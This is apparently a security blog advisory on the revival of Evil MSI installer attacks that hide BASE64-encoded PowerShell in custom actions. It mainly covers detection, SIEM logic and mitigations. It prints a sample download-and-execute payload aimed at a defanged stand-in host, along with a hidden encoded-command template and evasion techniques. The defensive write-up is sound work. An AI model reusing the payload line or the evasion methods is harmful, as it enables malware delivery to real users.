Evil MSI Background Attacks Return With BASE64 Tricks

Attackers are reviving the Evil MSI (Microsoft Installer) technique, leveraging BASE64 encoding and statistical obfuscation to bypass detection mechanisms. This campaign exploits Windows Installer’s legitimate functionality to execute malicious payloads while evading traditional signature-based security controls. Organizations must implement enhanced detection strategies focused on behavioral analysis and entropy measurements to identify these sophisticated attacks.

Introduction

The cybersecurity community is witnessing a resurgence of Evil MSI attacks, now enhanced with BASE64 encoding tricks and statistical manipulation techniques designed to evade modern security solutions. First observed in limited campaigns several years ago, this attack vector has evolved significantly, incorporating advanced obfuscation methods that challenge conventional detection approaches.

Microsoft Installer (MSI) files are trusted Windows components used for software installation, making them attractive vehicles for malicious payloads. The latest iteration combines this inherent trust with sophisticated encoding schemes that obscure malicious intent until execution. Security researchers have identified multiple samples exhibiting unusual BASE64 patterns and statistical anomalies that suggest coordinated development efforts.

This resurgence demonstrates attackers’ continuous adaptation to defensive measures, emphasizing the need for security teams to understand both the technical mechanisms and detection strategies for these threats.

Background & Context

MSI files operate with elevated privileges during installation, providing attackers with a powerful execution environment. The Windows Installer service processes these files automatically, often with minimal user interaction beyond initial approval. This trusted execution path makes MSI an attractive alternative to increasingly scrutinized file formats like executable files and macro-enabled documents.

The original Evil MSI technique involved embedding malicious scripts or executables within legitimate-looking installer packages. However, signature-based detection systems quickly adapted to identify common patterns. The current campaign introduces BASE64 encoding as an obfuscation layer, transforming recognizable malicious code into seemingly innocuous text strings.

BASE64 encoding converts binary data into ASCII text format, commonly used for legitimate purposes like email attachments and embedded resources. Attackers exploit this legitimate functionality to hide PowerShell commands, scripts, and executable payloads within MSI custom actions. The statistical analysis component references methods for identifying encoded content through entropy measurement and character distribution analysis.

Technical Breakdown

The attack chain begins with MSI files delivered through phishing emails, compromised websites, or software supply chain infiltration. These installers appear legitimate, often mimicking popular software packages or system updates.

Custom Actions and Execution Flow

MSI files support custom actions that execute scripts or commands during installation. Attackers leverage this feature to run BASE64-encoded PowerShell commands:

powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand 

The encoded payload typically contains multi-stage downloaders that retrieve additional malware components. The BASE64 encoding obscures command content from static analysis and signature matching.

Statistical Obfuscation Techniques

Attackers employ statistical manipulation to evade entropy-based detection:

• Padding Injection: Adding random legitimate-looking data to normalize entropy scores
• Character Distribution Balancing: Adjusting BASE64 output to match expected statistical profiles
• Fragmentation: Splitting encoded payloads across multiple custom actions
• Junk Code Insertion: Embedding non-functional BASE64 strings to confuse analysis tools

These techniques create statistical profiles that resemble benign installers, defeating automated analysis systems relying on anomaly detection.

Payload Delivery Mechanisms

Once executed, the decoded PowerShell typically performs these actions:

# Example decoded payload structure
$url = "hxxp://malicious-domain[.]com/payload.exe"
$output = "$env:TEMP\update.exe"
Invoke-WebRequest -Uri $url -OutFile $output
Start-Process $output

The final payload ranges from information stealers and ransomware to remote access trojans and cryptocurrency miners.

Impact & Risk Assessment

Organizational Impact

Evil MSI attacks pose significant risks across multiple dimensions:

Privilege Escalation: MSI files often execute with SYSTEM privileges, granting attackers immediate administrative control without additional exploitation steps.

Defense Evasion: BASE64 obfuscation and statistical normalization bypass signature-based antivirus, endpoint detection systems, and email security gateways that rely on pattern matching.

Persistence Establishment: Attackers can modify registry keys, create scheduled tasks, and install services during the MSI installation process, ensuring long-term access.

Affected Sectors

All Windows-based organizations face exposure, with particular risk to:

• Enterprise environments with software deployment automation
• Organizations permitting user-initiated software installation
• Environments with legacy security controls lacking behavioral analysis
• Supply chain partners distributing software packages

Risk Severity

The combination of trusted execution paths, privilege escalation, and sophisticated evasion techniques creates a HIGH severity risk profile. The attack requires minimal user interaction and bypasses multiple security layers simultaneously.

Vendor Response

Microsoft has not issued specific patches for this attack vector, as it exploits legitimate MSI functionality rather than software vulnerabilities. However, Windows Defender and Microsoft Defender for Endpoint have received signature updates targeting known malicious MSI samples.

Security vendors have responded with detection enhancements:

• Antivirus Providers: Updated heuristic engines to analyze custom action content and identify suspicious BASE64 patterns
• EDR Solutions: Implemented behavioral monitoring for MSI processes spawning unexpected child processes
• Email Security Gateways: Enhanced filtering rules for MSI attachments and improved sandboxing capabilities

Third-party security researchers continue publishing indicators of compromise and YARA rules for community defense.

Mitigations & Workarounds

Immediate Actions

Restrict MSI Execution: Implement application whitelisting to control MSI installation sources:

# Example AppLocker rule for MSI restriction
New-AppLockerPolicy -RuleType Installer -Mode Enforce -User Everyone -Action Deny -PathCondition "%TEMP%\*"

Disable Windows Installer for Standard Users: Use Group Policy to restrict installer privileges:

• Navigate to: Computer Configuration → Administrative Templates → Windows Components → Windows Installer
• Enable “Always install with elevated privileges” = Disabled

Long-Term Controls

• Email Filtering: Block or quarantine unsolicited MSI attachments
• Network Segmentation: Limit MSI execution to designated deployment systems
• Code Signing Enforcement: Require valid digital signatures for all MSI files
• User Training: Educate staff on risks of installing unsolicited software

Detection & Monitoring

Behavioral Indicators

Monitor for these suspicious activities:

# PowerShell command-line logging for encoded commands
EventID 4104 | Where-Object {$_.ScriptBlockText -match "-EncodedCommand"}

# MSI processes spawning unusual child processes
msiexec.exe → powershell.exe
msiexec.exe → cmd.exe → certutil.exe

Statistical Analysis

Implement entropy calculation for BASE64 strings within MSI custom actions:

• Baseline legitimate installer entropy scores
• Alert on significant deviations from established profiles
• Analyze character frequency distribution in encoded content

Network Monitoring

Track outbound connections from MSI processes:

• Monitor DNS requests to newly registered domains
• Identify HTTPS connections to non-categorized destinations
• Correlate installation events with subsequent network activity

SIEM Detection Rules

# Example detection logic
rule EvilMSI_EncodedPayload
  events:
    - event_type: process_creation
      parent_process: msiexec.exe
      command_line: contains("-EncodedCommand")
  condition: event_count > 0
  severity: high

Best Practices

Administrative Controls

• Principle of Least Privilege: Restrict software installation rights to IT administrators
• Change Management: Require approval workflows for all software deployments
• Asset Inventory: Maintain comprehensive software asset registers to identify unauthorized installations

Technical Controls

• Application Whitelisting: Deploy comprehensive application control solutions
• Enhanced Logging: Enable PowerShell script block logging and transcription
• Endpoint Detection: Implement behavioral EDR solutions with MSI monitoring
• Sandbox Analysis: Route suspicious MSI files through automated sandboxing

Operational Controls

• Threat Intelligence Integration: Consume IOC feeds specific to MSI-based attacks
• Regular Security Assessments: Test detection capabilities against MSI attack simulations
• Incident Response Planning: Develop specific playbooks for installer-based compromises

Key Takeaways

• Evil MSI attacks leverage trusted Windows functionality combined with BASE64 obfuscation to evade detection
• Statistical manipulation techniques defeat traditional entropy-based analysis methods
• Organizations must implement layered defenses including behavioral monitoring, application whitelisting, and enhanced logging
• Detection strategies should focus on process relationships and command-line analysis rather than static signatures
• User education and administrative controls remain critical complementary defenses

The resurgence of Evil MSI attacks demonstrates that attackers continuously refine existing techniques rather than exclusively developing novel exploits. Security teams must maintain vigilance across all attack vectors, including those leveraging legitimate system functionality.

References

• SANS Internet Storm Center: “Evil MSI Background: BASE64 Statistical Analysis” (June 15)
• Microsoft Documentation: Windows Installer Custom Actions
• MITRE ATT&CK: T1218.007 – Signed Binary Proxy Execution: Msiexec
• NIST SP 800-53: Application Whitelisting Security Controls
• PowerShell ScriptBlock Logging Configuration Guidelines

Stay updated at https://cydhaal.com — Your Daily Dose of Cyber Intelligence.
📧 Subscribe to our newsletter at https://cydhaal.com/newsletter/